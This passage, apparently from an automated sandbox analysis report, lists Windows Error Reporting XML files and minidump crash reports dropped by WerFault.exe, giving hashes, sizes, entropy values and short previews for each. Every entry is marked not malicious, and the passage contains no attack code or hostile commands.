                  MD5:2CE1912D0501C4E954D127D71FB45C30
                  SHA1:5A7D5AF3D139124880D7087C8854E64BEF3EF859
                  SHA-256:36A6EDA051098FD2981D374303FBFF481DC326FD6A00D45ADD8E672C53CC20FF
                  SHA-512:5796699ECAB17A1841BFA7CF862A37794A18F2855C92023F5B05D86BFD0B03DCD33A4AF2E3C73D3291E79A052A3C126AA7E34D0BF6CEF613C59A70E06FD7E981
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>.. <WindowsNTVersion>10.0</WindowsNTVersion>.. <Build>19045</Build>.. <Product>(0x30): Windows 10 Pro</Product>.. <Edition>Professional</Edition>.. <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>.. <Revision>2006</Revision>.. <Flavor>Multiprocessor Free</Flavor>.. <Architecture>X64</Architecture>.. <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>.. <Pid>3916</Pi
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4589
                  Entropy (8bit):4.463516599895248
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zs5Jg77aI9ZCjWpW8VYfXYm8M4J40FYd+q8xDPsJLYhsd:uIjfLI7+S7VYKJcGPsFYhsd
                  MD5:C99BAD0F204B046CEDF5F165563F334E
                  SHA1:9DCA2467D04D09F283C8A835B44AC5ECCF907B6E
                  SHA-256:F3E3AC6534E8854B3987C353A98E636235EC4A1C985508CFA6BA0311405D748C
                  SHA-512:0730EFBE7986000CEBC239A0DCF0EFDF08D53D25A54756B8DD9940235CA50CE2A7BE4DEF8BE49CC67E66354FB7A20A11714A4CF93F1C6549F0665CB102948892
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="405037" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Wed Jul 10 15:35:03 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):87990
                  Entropy (8bit):2.1266135777787425
                  Encrypted:false
                  SSDEEP:384:TCBTeLRavpN4I0smgS9UVQ0WRUJbdCrjtfUXeZ9nxiirzEHCwpC:TgS1avpNishSmVXh7qjNUXuxDEiD
                  MD5:B9123197A4C2C574C3D5A01644C92DB2
                  SHA1:BA8C0F7BA5F85C797C2821B20EA2933170BC6DB4
                  SHA-256:7E70A541310CF1C081DFE95147DFDAB3A67917100D1409AAB8AB26B55F156886
                  SHA-512:000E64938E942C85F5D506BE1D091A292EC046D1E240F3250662A908BC6150E0B40B0E689DE99B62492FB3AF16A2F26324956FCD33306AE1925E4F7DBC518BE1
                  Malicious:false
                  Preview:MDMP (minidump; unprintable bytes omitted; recoverable strings: GenuineIntel, Eastern Standard Time, Eastern Summer Time, 19041.1.amd64fre.vb_release.191206-1406)
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8340
                  Entropy (8bit):3.6998485656372155
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJPC0b6qtv6Y2DmSUeVvgmfBTrpBy89b2HsfNSm:R6lXJRb6w6YbSU8gmfl/2MfJ
                  MD5:2DAE3CF1A504FCA88AA70FBA841DBE34
                  SHA1:AD82A68F76E04781691C7241B1A2A829B51FD92E
                  SHA-256:2C34285D8A21CB7FFB40C88E9E942BCBB71C0418A058DA7188EE01D2F1D0A4DE
                  SHA-512:1A4F5F8D972B62965740BAFB2846FE3F58CC87158F93B2584166D0E348550FC6D8D7AF1F5F8E412FCC8F375B5C35E9B600CDD2D2B8CF9681A56C9168DE344F2E
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>.. <WindowsNTVersion>10.0</WindowsNTVersion>.. <Build>19045</Build>.. <Product>(0x30): Windows 10 Pro</Product>.. <Edition>Professional</Edition>.. <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>.. <Revision>2006</Revision>.. <Flavor>Multiprocessor Free</Flavor>.. <Architecture>X64</Architecture>.. <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>.. <Pid>3916</Pi
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4589
                  Entropy (8bit):4.465041512303174
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zs5Jg77aI9ZCjWpW8VYAYm8M4J40FMou+q8xDPsJLYhsd:uIjfLI7+S7VwJ8GPsFYhsd
                  MD5:EEC41522C3B7A29E99CB9DE08318C940
                  SHA1:B361F6C95002A157C35DBD3BE9004CC854987485
                  SHA-256:08D4F8EF19336B93EDF8C964C9073FCB610EF3FDBEAB1F68E4F922C05432CC74
                  SHA-512:82D54DFF49C62E0B4348AC93474ADA4048BD24DD4BF7A8CA13EEE1814C159860AA3A8AB9EBDD954F3D1306478BE92AA6172044EB482B95E245232F40B3ECB248
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="405037" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Wed Jul 10 15:35:04 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):104278
                  Entropy (8bit):2.103389881446042
                  Encrypted:false
                  SSDEEP:768:cB1TMJGZvp1TxeshJVSVG0dKrDUXuNJKhfHE:WTMg1T/VXDUXuNUhfHE
                  MD5:ACF685593F5BEB93169D6CCABA3CF2BF
                  SHA1:D5EA09985F2A7228FE2FD06C5D855826DD4349B8
                  SHA-256:99ADC10B8EA3472EDCDB00B5F5A7AA62DD2435BA8F69B0677304DA0759EFBABE
                  SHA-512:844403EE4BD9D376299F55DD12DBA609D603E12116F0F567209D04C19726759BF5884590ED90164C270887B466DEFA94553775AE60BD3069DFA61EF2FB1814C4
                  Malicious:false
                  Preview:MDMP (minidump; unprintable bytes omitted; recoverable strings: GenuineIntel, Eastern Standard Time, Eastern Summer Time, 19041.1.amd64fre.vb_release.191206-1406)
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8342
                  Entropy (8bit):3.698795727869111
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJPC26y6Y2DDSUJhvgmfBTrpBM89b2HsfBSm:R6lXJr6y6YuSUJ5gmflN2MfV
                  MD5:4AA7E5A8F05DA985B19EBD859AEECDBF
                  SHA1:8C90AEF97080103C24EA6503ADEDB1B759111054
                  SHA-256:9062BA19F050C607C07EDD21A6AB57235A87548CB998A4F62FB9BD093875820A
                  SHA-512:25753E701F58D7BC201790112CA4C7EF182CB77C08DCFA3D3C2AD4774C695D01EDCC985F5077297B110E91B4380B6AD3C0A25484D820CEE229F02C95B50F3297
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>.. <WindowsNTVersion>10.0</WindowsNTVersion>.. <Build>19045</Build>.. <Product>(0x30): Windows 10 Pro</Product>.. <Edition>Professional</Edition>.. <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>.. <Revision>2006</Revision>.. <Flavor>Multiprocessor Free</Flavor>.. <Architecture>X64</Architecture>.. <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>.. <Pid>3916</Pi
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4589
                  Entropy (8bit):4.466068831721788
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zs5Jg77aI9ZCjWpW8VYZYm8M4J40F7+q8xDPsJLYhsd:uIjfLI7+S7VdJvGPsFYhsd
                  MD5:9D60570EA9D1B90420634F24D1301BAA
                  SHA1:25903F75C55A310B8DB7575AF7C93EE3CE7C1780
                  SHA-256:4538AB8F41F7BA32B11A7998F404E7831F8E938D171BA008932E83134BCE296A
                  SHA-512:27A671C4D48B246D9994FFD37F8689FB931D9BF7250BD2A572B58CADCEFE103A7681D22FE45953EDC0F97C675C7FAE3845B15175ED0EBC4E52544D5C861936D2
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="405037" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Wed Jul 10 15:35:05 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):113702
                  Entropy (8bit):2.274128963240991
                  Encrypted:false
                  SSDEEP:768:21TMJ0uvp1zEIshJVSj0o5yvJcKcDUXuN4bGWcxiXo:6TMiG1zEbV9pJODUXuNvWcxi4
                  MD5:F670BFE32977EE9A0C2273D0FCE91025
                  SHA1:DEA7104F3D092D8096569400516AA37FE38D9277
                  SHA-256:C2FC3F98B2BE17B556DC75854A389480CFF1038105C790F4050A15D425C32AD0
                  SHA-512:3E477EF3AE77123538D7B6185FD4BAD62A347B86E5C2BBA63B06283B3CC365671DFE8B8C0FE71C1499FAAE0D3C2DA5D94275C79220280D18CDFCD5CDDEEF55A6
                  Malicious:false
                  Preview:MDMP..a..... .......)..f........................`...(.......<...............PJ..........`.......8...........T............+...........................!..............................................................................eJ......H"......GenuineIntel............T.......L...!..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8342
                  Entropy (8bit):3.7000960316584295
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJPC36qo6Y2DNSUlzAgmfBTrpBa89b/Hsf7Vm:R6lXJq616YwSUl0gmflX/Mfk
                  MD5:4939CFAC4359E004B9594D7201071666
                  SHA1:D7E13DDF77727E9946EBADAE497753A7201AB0F7
                  SHA-256:47AA5738143C4764C918150286B6FE548D8F2E6FBFE496935615F795DC78D3B8
                  SHA-512:CBFDAD3B359A02FD27179FA0BEBE242A5AB8979DD801FFCC4269100E98F10383B388EA00274BC044EB420C0B19797AA8A0A7BA1F249A9BB93CF5ED3F220E7378
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.9.1.6.<./.P.i.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4589
                  Entropy (8bit):4.467131217726673
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zs5Jg77aI9ZCjWpW8VYlYm8M4J40FG+q8xDPsJLYhsd:uIjfLI7+S7VhJSGPsFYhsd
                  MD5:5374E7F9B3E2436E433E9609427060C9
                  SHA1:61E9871E20394DEEFC89DE8AEEE5350B6919EA6C
                  SHA-256:B8D5E5C12760E9EB66FBD96F30880F025E12FA80BD600562A6B337E074CFB0FD
                  SHA-512:22D75FD9B076F953087ACC9A8692FAA5F699AECFEF6FC841ACFBB9992DAA1DA83FBEA825495F23A92C0D3ABC7585A7CCC15A579CA4007978C9AFA388EBC3E5A7
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="405037" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Wed Jul 10 15:35:06 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):114892
                  Entropy (8bit):2.1075722828047314
                  Encrypted:false
                  SSDEEP:768:xRzyxYvp163shJVSSArDEV3GaS4mUXuNhrVAn:Lyq16IVLAEVWaS4mUXuNhrVAn
                  MD5:03ED2554FDEA33B9E9166F303774F0A1
                  SHA1:BC165F2E36659E1355F284645C19F68017057DB6
                  SHA-256:F00581BD0F6256647B40C6C1CC18F8AFFAD6F9B2D7066A33C1D751514A8D344A
                  SHA-512:CDA8D97B425CA48FC6CA1AFC19DDA647740F94FF7BE385BF0381B371FF4F7467FD0EF101C7FA48D74BB98C2F8F26E04A453E766F3E68C0CAEC9788358C6989B2
                  Malicious:false
                  Preview:MDMP..a..... .......*..f............D...............X.......<.... ......T....O..........`.......8...........T...............,...........8!..........$#..............................................................................eJ.......#......GenuineIntel............T.......L...!..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8342
                  Entropy (8bit):3.700015879752446
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJPC56s6Y2DRSU/h3gmfBTrpB789bEHsfUsm:R6lXJk6s6YMSU/BgmfloEMfW
                  MD5:AC646E47A774000790F8BE97EF2D3DE9
                  SHA1:F225ECD4E849604875E24BDE870DC950E7295BC5
                  SHA-256:C7D427A5C74716BCDC5F05F06F670FCD41E3A8481F1D7C576009B41515875B90
                  SHA-512:8A04211325BF43FA8344AF6513E477B6FA083DCDBADF0981175D1E4B00F58635FEAEFD7FC17AE18C2F25E7C1E085DD045F879E5F5705118E9EB08A322B869023
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.9.1.6.<./.P.i.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4589
                  Entropy (8bit):4.4633172977843465
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zs5Jg77aI9ZCjWpW8VY9PYm8M4J40FEN+q8xDPsJLYhsd:uIjfLI7+S7V8SJ4NGPsFYhsd
                  MD5:E664332E4460CB2AE36C5B55D43DAEEE
                  SHA1:BFE0A9FF9E834ADDE09ADB24D7E61863B57590BA
                  SHA-256:C6D43B0815E6C838A558E6E7F188E57CED52FA7C59F0BA6E9D23B622A203A1A6
                  SHA-512:B8130572FC7B3DB06E11515F7328E1A4D9FE92AB9DE794044FAE32EED79C89F842AE7B517D749D9EA9F2BB3807EBA69150B770E29815C3053CC919BD4449920C
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="405037" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Wed Jul 10 15:35:07 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):127228
                  Entropy (8bit):2.1664790364403794
                  Encrypted:false
                  SSDEEP:768:D+m3xVvp1+H2CshJVSxgVGbU2eTgzsQb+UXuNoSeW85mb:Dj3R1+H2hVhVc4gzsvUXuNoSeW85mb
                  MD5:938856874EF9E5ED2AA757D521D07FEE
                  SHA1:214D95D694341879473CA6B101B659394B36D52E
                  SHA-256:FA6DCEE1C7133D18A74F828E2B445734C8B4A323F9F59DF7F20CC8F92586A399
                  SHA-512:7E078D399CEA47AA5637E3CF2327B154450D795447A253E53CD20AC33F7010FC987CB3B2B4EB31BA77E5AE91146142D8021BE4C787DF8C05B0DC38BE7DE104E1
                  Malicious:false
                  Preview:MDMP..a..... .......+..f............t...........|...........<...."..........LS..........`.......8...........T............1..............@"..........,$..............................................................................eJ.......$......GenuineIntel............T.......L...!..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8344
                  Entropy (8bit):3.6971027749150727
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJPCjS6f36Y2D4SUvh3gmfBTrpBG89bBbHsfRbjm:R6lXJsS6f6Y1SUvBgmfl7BbMft6
                  MD5:60809255B464810FE71C476EE719FB27
                  SHA1:47CAE4EC0D4520FE754593E1D3E09FA583CB1DCB
                  SHA-256:C88A7694A6BA842938315071AAF5D972D780609C14E3897D517819C9B135E276
                  SHA-512:5A47150CD2D95D3F02F1D2B3C6F8C02103AC250BA744FD013F11CE26A1D8B256BDF5414F8B55B290A7CFF7467B63D7570A6DCBE126235AE8F857E1BA62030FB3
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.9.1.6.<./.P.i.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4589
                  Entropy (8bit):4.465642204326791
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zs5Jg77aI9ZCjWpW8VYTYm8M4J40Fdo+q8xDPsJLYhsd:uIjfLI7+S7VXJJoGPsFYhsd
                  MD5:519EE97857915FCE9C7673BAED95020E
                  SHA1:2D9ADDE121CE2F319A4A5A95556B660C9DF02F12
                  SHA-256:602B76B3184E74FE441C371082871EA83FA93464FF1A159FA3C0FDE75E19CC25
                  SHA-512:32A0541FE47E6E1D47DBECF6489C3331B413D4634C56B71579C02A6241EBA6C2AF62D8DEE2DDBE2799DAEE83A2E687B81FABFC8C25BB8F78A547A225A21769EE
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="405037" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Wed Jul 10 15:35:09 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):47418
                  Entropy (8bit):2.6639693213312157
                  Encrypted:false
                  SSDEEP:384:yg/gMHHhpsQr1vp1dAaS4h0eZ9ni/XgWIDZqzaMx:DY2hpsu1vp1dA/mivgWMI9
                  MD5:0CA9ED1A542296CC1F821DDC0480E032
                  SHA1:0F3ABF09E74F3FCEF31744A082ACDF36E3E1DCB8
                  SHA-256:9A6A603B503CFA086766B2F5F8351E660BAE1E3DA348AE82CE317A6EC321A273
                  SHA-512:4955542B182068B1223558949BB0E63EB9ED794E2D9125691B413E4437824603BEE1D153004C8EC93C59C574DC7C3FCE48A8B2BC87945C4A29E34CFC94A7C349
                  Malicious:false
                  Preview:MDMP..a..... .......-..f............4........... ...H.......<...h$..........p5..........`.......8...........T............<...|...........$...........&..............................................................................eJ......('......GenuineIntel............T.......L...!..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8348
                  Entropy (8bit):3.6974232818236104
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJPCd6fnr6Y2DySURMK0rgmfBRCpDz89bTHsfTxm:R6lXJI6fr6YfSURM5rgmf37TMfY
                  MD5:4103DFC843387CCAB02371C18295AEA6
                  SHA1:2407F874F3A5BD350A55DC2C4637FD95E357AF67
